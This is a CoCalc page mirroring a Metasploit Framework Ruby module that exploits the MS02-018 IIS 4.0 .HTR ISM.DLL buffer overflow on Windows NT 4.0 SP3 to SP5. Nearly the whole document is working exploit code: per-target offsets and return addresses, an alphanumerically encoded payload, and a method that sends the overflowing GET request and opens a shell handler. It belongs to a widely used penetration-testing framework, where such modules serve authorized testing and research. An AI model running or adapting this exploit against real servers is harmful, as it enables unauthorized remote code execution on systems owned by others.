Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/iis/ms02_018_htr.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'MS02-018 Microsoft IIS 4.0 .HTR Path Overflow',

16
        'Description' => %q{

17
          This exploits a buffer overflow in the ISAPI ISM.DLL used to

18
          process HTR scripting in IIS 4.0. This module works against

19
          Windows NT 4 Service Packs 3, 4, and 5. The server will

20
          continue to process requests until the payload being

21
          executed has exited. If you've set EXITFUNC to 'seh', the

22
          server will continue processing requests, but you will have

23
          trouble terminating a bind shell. If you set EXITFUNC to

24
          thread, the server will crash upon exit of the bind shell.

25
          The payload is alpha-numerically encoded without a NOP sled

26
          because otherwise the data gets mangled by the filters.

27
        },

28
        'Author' => [ 'stinko' ],

29
        'License' => BSD_LICENSE,

30
        'References' => [

31
          [ 'CVE', '1999-0874'],

32
          [ 'OSVDB', '3325'],

33
          [ 'BID', '307'],

34
          [ 'URL', 'http://www.eeye.com/html/research/advisories/AD19990608.html'],

35
          [ 'MSB', 'MS02-018'],

36
        ],

37
        'Privileged' => true,

38
        'Payload' => {

39
          'Space' => 2048,

40
          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),

41
          'StackAdjustment' => -3500,

42
        },

43
        'Platform' => 'win',

44
        'Targets' => [

45
          ['Windows NT 4.0 SP3', { 'Platform' => 'win', 'Rets' => [ 593, 0x77f81a4d ] }],

46
          ['Windows NT 4.0 SP4', { 'Platform' => 'win', 'Rets' => [ 593, 0x77f7635d ] }],

47
          ['Windows NT 4.0 SP5', { 'Platform' => 'win', 'Rets' => [ 589, 0x77f76385 ] }],

48
        ],

49
        'DefaultOptions' => { 'AllowWin32SEH' => true }, # needed for pure alpha GetEIP stub

50
        'DisclosureDate' => '2002-04-10',

51
        'DefaultTarget' => 0,

52
        'Notes' => {

53
          'Reliability' => UNKNOWN_RELIABILITY,

54
          'Stability' => UNKNOWN_STABILITY,

55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

56
        }

57
      )

58
    )

59


60
    register_options(

61
      [

62
        Opt::RPORT(80)

63
      ]

64
    )

65
  end

66


67
  def exploit

68
    connect

69


70
    buf = 'X' * target['Rets'][0]

71
    buf << [ target['Rets'][1] ].pack('V')

72
    buf << payload.encoded

73


74
    req = "GET /#{buf}.htr HTTP/1.0\r\n\r\n"

75
    print_status("Trying target #{target.name} with jmp eax at 0x%.8x..." % target['Rets'][1])

76
    sock.put(req)

77
    handler

78
    disconnect

79
  end

80
end

81


82